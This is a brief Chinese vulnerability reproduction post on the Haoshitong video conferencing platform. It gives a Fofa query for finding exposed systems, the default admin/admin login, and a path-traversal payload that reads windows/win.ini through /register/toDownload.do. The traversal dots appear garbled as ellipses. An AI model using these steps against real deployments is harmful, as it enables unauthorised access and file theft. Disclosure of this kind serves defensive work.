0x00 产品介绍
深圳齐心好视通云计算有限公司是国内知名的云计算产品和服务提供商,隶属于齐心集团(股票代码:002301)。 公司旗下“好视通”是国内云视频会议知名品牌,连续三年在云视频会议市场占有率第一(数据来源IDC调研报告),其应用范围主要包含:远程会议,远程教育,远程培训,远程医疗,远程招聘,应急指挥等。
0x01漏洞简介
好视通视频会议平台系统存在弱口令和任意文件下载漏洞。
0x02 Fofa语法
“深圳银澎云计算有限公司”
搜索结果如下:
0x03 漏洞复现
1、目标站点如下所示:
2、默认口令 admin/admin 登录:
3、任意文件下载,Payload: /register/toDownload.do?fileName=…/…/…/…/…/…/…/…/…/…/…/…/…/…/windows/win.ini,效果如下: